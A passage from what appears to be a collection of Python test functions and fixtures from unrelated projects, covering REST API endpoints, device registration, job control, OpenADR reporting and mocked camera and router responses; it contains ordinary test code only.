mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', '', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_get_query_with_api_key(self):\r\n users = UserFactory.create_batch(3)\r\n app = AppFactory.create(owner=users[0], info={'total': 150})\r\n task = TaskFactory.create(app=app, info={'url': 'my url'})\r\n taskrun = TaskRunFactory.create(task=task, user=users[0],\r\n info={'answer': 'annakarenina'})\r\n for endpoint in self.endpoints:\r\n url = '/api/' + endpoint + '?api_key=' + users[1].api_key\r\n res = self.app.get(url)\r\n data = json.loads(res.data)\r\n\r\n if endpoint == 'app':\r\n assert len(data) == 1, data\r\n app = data[0]\r\n assert app['info']['total'] == 150, data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'task':\r\n assert len(data) == 1, data\r\n task = data[0]\r\n assert task['info']['url'] == 'my url', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'taskrun':\r\n assert len(data) == 1, data\r\n taskrun = data[0]\r\n assert taskrun['info']['answer'] == 'annakarenina', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'user':\r\n assert len(data) == 3, data\r\n user = data[0]\r\n assert user['name'] == 'user1', data\r\n assert res.mimetype == 'application/json', res", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file('l3out1')\n self.write_config_file(config, args)\n collector = execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n 
self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out1', 'intersite-testsuite-app-epg'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out1', 'intersite-testsuite-app-epg'))\n\n config = self.create_config_file('l3out2')\n self.write_config_file(config, args)\n collector.reload_config()\n time.sleep(2)\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out2', 'intersite-testsuite-app-epg'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out2', 'intersite-testsuite-app-epg'))", "def test_request_created_once(self):\n\n usual_user = UserFactory(\n username='Usual User',\n email='[email protected]',\n )\n token = Token.objects.get(user=usual_user)\n self.client.credentials(\n HTTP_AUTHORIZATION=f'Token {token.key}')\n data = {'team': self.team.id}\n self.client.post(reverse('api:user-team-requests-list'), data=data) # first request\n response = self.client.post(reverse('api:user-team-requests-list'), data=data) # second request\n self.assertEqual(response.status_code, forum_status.STATUS_222_USER_ALREADY_REQUESTED)", "def setUp(self):\n self.schedule_route_url = api_reverse('route:schedule-route')\n self.login_url = api_reverse('authentication:user-login')\n self.join_route_url = api_reverse('route:join-route')\n self.retrieve_route_url = api_reverse('route:retrieve-route')\n self.register_vehicle_url = api_reverse('vehicle:register-vehicle')\n\n\n\n\n self.user_one = User.objects.create_user(\n first_name='jane1',\n last_name='Doe1',\n surname='jDoe1',\n email='[email protected]',\n password='janeDoe@123',\n id_number=1223,\n phone_number=\"+254712534545\",\n is_active=True)\n\n self.user_two = User.objects.create_user(\n first_name='rose',\n last_name='mary',\n surname='mary',\n email='[email protected]',\n username=\"rosemary\",\n password='janeDoe@123',\n id_number=122843,\n phone_number=\"+2547129743545\",\n is_active=True)\n\n self.user_three = User.objects.create_user(\n first_name='Three',\n last_name='Mine',\n surname='James',\n email='[email protected]',\n username=\"Three\",\n password='janeDoe@123',\n id_number=1228444,\n phone_number=\"+2547179743545\",\n is_active=True)\n\n self.valid_route_details = {\n \"destination\": {\"latitude\": 37.0625,\"longitude\": -95.677068},\n \"starting_point\": {\"latitude\": 37.0625,\"longitude\": -95.677068},\n \"commuting_time\": \"17:00\"\n }\n self.valid_route_two_details = {\n \"destination\": {\"latitude\": 31.0625,\"longitude\": -95.677068},\n \"starting_point\": {\"latitude\": 31.0625,\"longitude\": -95.677068},\n \"commuting_time\": \"17:00\"\n }\n\n self.valid_user_login_details = {\n 'email': '[email protected]',\n 'password': 'janeDoe@123',\n }\n self.valid_user_two_login_details = {\n 'email': '[email protected]',\n 'password': 'janeDoe@123',\n }\n self.valid_user_three_login_details = {\n 'email': '[email protected]',\n 'password': 'janeDoe@123',\n }\n self.token = self.login_user().data['token']\n self.token_two = self.login_user_two().data['token']\n self.token_three = self.login_user_three().data['token']\n self.route ={\n 'route':self.get_route_object().id\n }\n\n self.valid_vehicle_details = {\n \"registration_number\": \"KAC236Q\",\n \"capacity\": \"5\"\n }\n 
vehicle = self.register_vehicle()\n self.vehicle_id = {\n 'vehicle': vehicle.id\n }", "def testLoadTestRequestsMultipleUsers(self):\n user_list = ['alice', 'bob', 'charles']\n def sendRequestExpect200():\n for user in user_list:\n response = requests.get(\"http://localhost:%d/weather/%s\" % (self.port_number, user))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.text, 'cloudy')\n # Subscribe all users to weather updates so that messages\n # are persisted when posted.\n for user in user_list:\n response = requests.post(\"http://localhost:%d/weather/%s\" % (self.port_number, user), data='')\n self.assertEqual(response.status_code, 200)\n # Check that server stays up when subjected to requests from multiple users.\n self.runMultipleRequests(50, sendRequestExpect200)", "def test_normal_operation(self, mocker):\n api = mocker.Mock(spec=TelemetryAPI)\n api.record_unique_keys.return_value = HttpResponse(200, '')\n\n unique_keys_tracker = UniqueKeysTracker()\n unique_keys_tracker.track(\"key1\", \"split1\")\n unique_keys_tracker.track(\"key2\", \"split1\")\n\n unique_keys_sync = UniqueKeysSynchronizer(mocker.Mock(), unique_keys_tracker)\n task = UniqueKeysSyncTask(unique_keys_sync.send_all, 1)\n task.start()\n time.sleep(2)\n assert task.is_running()\n assert api.record_unique_keys.mock_calls == mocker.call()\n stop_event = threading.Event()\n task.stop(stop_event)\n stop_event.wait(5)\n assert stop_event.is_set()", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "async def test_report_registration_with_status_report():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n server = OpenADRServer(vtn_id='testvtn')\n server.add_handler('on_register_report', on_register_report)\n server.add_handler('on_create_party_registration', on_create_party_registration)\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b',)\n\n # Add 4 reports\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device001',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device002',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_status,\n report_name='TELEMETRY_STATUS',\n report_specifier_id='StatusReport',\n resource_id='Device001')\n\n 
asyncio.create_task(server.run_async())\n # await asyncio.sleep(1)\n # Register the client\n await client.create_party_registration()\n\n # Register the reports\n await client.register_reports(client.reports)\n assert len(client.report_requests) == 3\n assert len(server.services['report_service'].report_callbacks) == 5\n await client.stop()\n await server.stop()", "def test_subscriber_access_for_two_vsg_services(self):", "def test_WINNF_FT_S_REG_18(self):\n\n # Register the devices\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n device_b = json.load(\n open(os.path.join('testcases', 'testdata', 'device_b.json')))\n device_c = json.load(\n open(os.path.join('testcases', 'testdata', 'device_c.json')))\n devices = [device_a, device_b, device_c]\n for device in devices:\n self._sas_admin.InjectFccId({'fccId': device['fccId']})\n device['measCapability'] = []\n request = {'registrationRequest': devices}\n response = self._sas.Registration(request)['registrationResponse']\n # Check registration response\n for resp in response:\n self.assertTrue('cbsdId' in resp)\n self.assertEqual(resp['response']['responseCode'], 0)\n del request, response\n\n # Blacklist the third device\n self._sas_admin.BlacklistByFccId({'fccId':device_c['fccId']})\n\n # Re-register the devices\n request = {'registrationRequest': devices}\n response = self._sas.Registration(request)['registrationResponse']\n\n # Check registration response\n self.assertEqual(len(response), len(devices))\n for response_num, resp in enumerate(response[:2]):\n self.assertEqual(resp['response']['responseCode'], 0)\n self.assertTrue('cbsdId' in resp)\n self.assertFalse('measReportConfig' in resp)\n self.assertFalse('measReportConfig' in response[2])\n self.assertEqual(response[2]['response']['responseCode'], 101)", "def test_1():\n\tassert api_call().status_code == 200", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "async def test_fetch_all_dispatch_routes(client):\n params = [('access_token', 'access_token_example'),\n ('group_id', 56),\n ('end_time', 56),\n ('duration', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n 
call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "def mock_default_vapix_requests(respx: respx, host: str = DEFAULT_HOST) -> None:\n respx.post(f\"http://{host}:80/axis-cgi/apidiscovery.cgi\").respond(\n json=API_DISCOVERY_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/basicdeviceinfo.cgi\").respond(\n json=BASIC_DEVICE_INFO_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/io/portmanagement.cgi\").respond(\n json=PORT_MANAGEMENT_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/lightcontrol.cgi\").respond(\n json=LIGHT_CONTROL_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/mqtt/client.cgi\").respond(\n json=MQTT_CLIENT_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/streamprofile.cgi\").respond(\n json=STREAM_PROFILES_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/viewarea/info.cgi\").respond(\n json=VIEW_AREAS_RESPONSE\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Brand\"\n ).respond(\n text=BRAND_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Image\"\n ).respond(\n text=IMAGE_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Input\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.IOPort\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Output\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Properties\"\n ).respond(\n text=PROPERTIES_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.PTZ\"\n ).respond(\n text=PTZ_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.StreamProfile\"\n ).respond(\n text=STREAM_PROFILES_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.post(f\"http://{host}:80/axis-cgi/applications/list.cgi\").respond(\n text=APPLICATIONS_LIST_RESPONSE,\n headers={\"Content-Type\": \"text/xml\"},\n )\n respx.post(f\"http://{host}:80/local/vmd/control.cgi\").respond(json=VMD4_RESPONSE)", "def 
test_create_multiple(self):\n contact = Contact.objects.first()\n sales_cycle = contact.sales_cycles.first()\n valid_data = [{'sales_cycle_id':sales_cycle.id, 'description':'test message', 'contact_id': contact.id}]\n url, parsed = self.prepare_urls('v1:activity-create-multiple', subdomain=self.company.subdomain)\n \n response = self.client.post(url, valid_data, HTTP_HOST=parsed.netloc, format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n self.authenticate_user()\n response = self.client.post(url, valid_data, HTTP_HOST=parsed.netloc, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n content = json.loads(response.content)\n self.assertTrue(content.has_key('notification'))", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def setUp(self):\n super(TestSyncServiceControl, self).setUp()\n self.api = ExternalApiClient()", "def test_called(self, mock_bootstrap, mock_api, mock_match):\n # host/port details returned by bootstrap\n mock_bootstrap.side_effect = [('host', 1234)]\n # short-circuit version checking\n mock_match.side_effect = [True] * 2\n mock_api.version().side_effect = ['1.0.0']\n\n # Check that all four api's created are passed the network details\n with patch('fetchai.ledger.api.TokenApi') as tapi, \\\n patch('fetchai.ledger.api.ContractsApi') as capi, \\\n patch('fetchai.ledger.api.TransactionApi') as txapi, \\\n patch('fetchai.ledger.api.ServerApi') as sapi:\n _ = LedgerApi(network='alpha')\n\n tapi.assert_called_once_with('host', 1234)\n capi.assert_called_once_with('host', 1234)\n txapi.assert_called_once_with('host', 1234)\n sapi.assert_called_once_with('host', 1234)\n\n # Check that bootstrap is queried\n mock_bootstrap.assert_called_once_with('alpha')", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_get_Events(self):\n event_a = Event.objects.create(title=\"christmas party\",\n start=datetime.strptime(\"2020-12-03 12:00\", \"%Y-%m-%d %H:%M\"),\n end=datetime.strptime(\"2020-12-03 16:00\", \"%Y-%m-%d %H:%M\"),\n event_owner=self.person_a,\n duration=timedelta(hours=4),\n recurrence_interval=0, description=\"happy christmas party\", website_publish=True)\n event_a.invites.add(self.comms_grp)\n event_a.save()\n event_b = Event.objects.create(title=\"Spring clean\",\n start=datetime.strptime(\"2020-04-03 09:00\", \"%Y-%m-%d %H:%M\"),\n end=datetime.strptime(\"2020-04-03 16:00\", \"%Y-%m-%d %H:%M\"),\n event_owner=self.person_a,\n duration=timedelta(hours=7),\n recurrence_interval=0, description=\"get the church clean\", website_publish=True)\n event_b.invites.add(self.comms_grp)\n event_b.save()\n client = APIClient()\n resp = 
client.get('/api/events')\n self.assertEqual(resp.status_code, 200)\n events = Event.objects.all()\n self.assertEqual(events[0].title, json.loads(resp.content)[1]['title'])\n self.assertEqual(events[1].title, json.loads(resp.content)[0]['title'])", "def test_run():\n gid = 123\n azure = create_azure_mock('GROUP1', [1, 2, 4, 5, 6, 7])\n data = [create_everbridge_contacts([1, 2, 3, 5, 8], True)]\n delete_ids = [3, 8]\n update_ids = [1, 2]\n insert_ids = [4, 6, 7]\n modify_everbridge_data(data[0], update_ids, 'phone', '8087779999')\n modify_everbridge_data(data[0], delete_ids, 'groups', [gid])\n update_data = create_everbridge_contacts(update_ids, True)\n insert_data = create_everbridge_contacts(insert_ids, False)\n upsert_data = update_data + insert_data\n inserted_data = [create_everbridge_contacts(insert_ids, True)]\n inserted_exids = (\n '&[email protected]' +\n '&[email protected]' +\n '&[email protected]')\n ever = create_everbridge_mock(data)\n ever.get_contacts_by_external_ids = MagicMock(side_effect=inserted_data)\n app = Synchronizer(azure, ever)\n # Call run\n rslt = app.run([gid])\n # Tests each method call\n azure.get_group_name.assert_called_with(123)\n ever.get_group_id_by_name.assert_called_with('GROUP1')\n ever.add_group.assert_not_called()\n ever.delete_group.assert_not_called()\n ever.delete_members_from_group.assert_called_with(gid, delete_ids)\n ever.delete_contacts.assert_called_with(delete_ids)\n ever.upsert_contacts.assert_called_with(upsert_data)\n ever.get_contacts_by_external_ids.assert_called_with(inserted_exids)\n ever.add_members_to_group.assert_called_with(gid, insert_ids)\n assert rslt == {\n 'GROUP1': {\n 'azure_group_id': 123, 'everbridge_group_id': 123,\n 'azure_count': 6, 'everbridge_count': 5, 'error_contacts': 0,\n 'inserted_contacts': 3, 'updated_contacts': 2, 'removed_members': 2,\n 'deleted_contacts': 2, 'added_members': 3}\n }", "def test_WINNF_FT_S_REG_9(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n device_b = json.load(\n open(os.path.join('testcases', 'testdata', 'device_b.json')))\n device_c = json.load(\n open(os.path.join('testcases', 'testdata', 'device_c.json')))\n\n # Inject FCC IDs\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n self._sas_admin.InjectFccId({'fccId': device_b['fccId']})\n self._sas_admin.InjectFccId({'fccId': device_c['fccId']})\n\n # Make sure measCapability contains no value for all array elements\n device_a['measCapability'] = []\n device_b['measCapability'] = []\n device_c['measCapability'] = []\n\n # Register two devices\n request = {'registrationRequest': [device_a, device_b]}\n response = self._sas.Registration(request)\n \n # Check registration response\n self.assertEqual(len(response['registrationResponse']), 2)\n for resp in response['registrationResponse']:\n self.assertTrue('cbsdId' in resp)\n self.assertEqual(resp['response']['responseCode'], 0)\n\n del request, response\n\n # Re-register two devices, register third device\n devices = [device_a, device_b, device_c]\n request = {'registrationRequest': devices}\n response = self._sas.Registration(request)\n\n # Check registration response\n self.assertEqual(len(response['registrationResponse']), len(devices))\n for resp in response['registrationResponse']:\n self.assertTrue('cbsdId' in resp)\n self.assertFalse('measReportConfig' in resp)\n self.assertEqual(resp['response']['responseCode'], 0)", "def makeTestMethods(name, fields):\n\n def tstCreateOK(self):\n post_json_body = 
{}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_create'.format(name.lower()),\n post_json_body,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('200 OK', response.status)\n self.assertIn(post_json_body['name'], response)\n\n def tstCreateBadHasId(self):\n post_json_body = {'id': self.keys[name.upper()].integer_id()}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_create'.format(name.lower()),\n post_json_body,\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n def tstReadBadWrongMethod(self):\n response = app.get('/cru_api.{}_read'.format(name.lower()),\n status=400)\n self.assertEquals('400 Bad Request', response.status)\n\n def tstReadBadNoContent(self):\n response = app.post_json('/cru_api.{}_read'.format(name.lower()),\n {},\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n def tstReadBadWrongId(self):\n response = app.post_json('/cru_api.{}_read'.format(name.lower()),\n {'id': 999},\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n def tstReadOK(self):\n response = app.post_json('/cru_api.{}_read'.format(name.lower()),\n {'id': self.keys[name.upper()].integer_id()},\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('200 OK', response.status)\n self.assertIn('id', response)\n\n def tstUpdateOK(self):\n post_json_body = {'id': self.keys[name.upper()].integer_id()}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_update'.format(name.lower()),\n post_json_body,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('200 OK', response.status)\n self.assertIn('id', response)\n self.assertIn(fields.keys().pop(), response)\n\n def tstUpdateBadMissingId(self):\n post_json_body = {}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_update'.format(name.lower()),\n post_json_body,\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n def tstUpdateBadWrongId(self):\n post_json_body = {'id': 999}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_update'.format(name.lower()),\n post_json_body,\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n return (tstCreateOK,\n tstCreateBadHasId,\n tstReadBadWrongMethod,\n tstReadBadNoContent,\n tstReadBadWrongId,\n tstReadOK,\n tstUpdateOK,\n tstUpdateBadMissingId,\n tstUpdateBadWrongId)", "def setUp(self):\n self.tool = flow_common_tool()\n self.xml = xml_tool()\n self.ins = route()\n\n self.response = {}\n self.response[\"HA_SINGLE_INSTANCE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>7</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n 
</instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_MULTI_INSTANCE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>7</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private1__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private1__.inet.0</irib-name>\n <irib-active-count>12</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private2__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private2__.inet.0</irib-name>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>1</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private3__</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private4__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private4__.inet.0</irib-name>\n <irib-active-count>2</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__master.anon__</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n <instance-core>\n <instance-name>mgmt_junos</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n </instance-information>\n \"\"\"\n\n\n self.response[\"HA_SINGLE_INSTANCE_BRIEF\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>18</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>1</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_DETAIL\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"detail\">\n <instance-core>\n <instance-name>master</instance-name>\n <router-id>10.208.133.147</router-id>\n <instance-type>forwarding</instance-type>\n <instance-state>Active</instance-state>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-route-count>18</irib-route-count>\n <irib-active-count>18</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n 
</instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-route-count>1</irib-route-count>\n <irib-active-count>1</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"detail\">\n <instance-core>\n <instance-name>master</instance-name>\n <router-id>10.208.133.147</router-id>\n <instance-type>forwarding</instance-type>\n <instance-state>Active</instance-state>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-route-count>20</irib-route-count>\n <irib-active-count>20</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.2</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.3</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>iso.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n 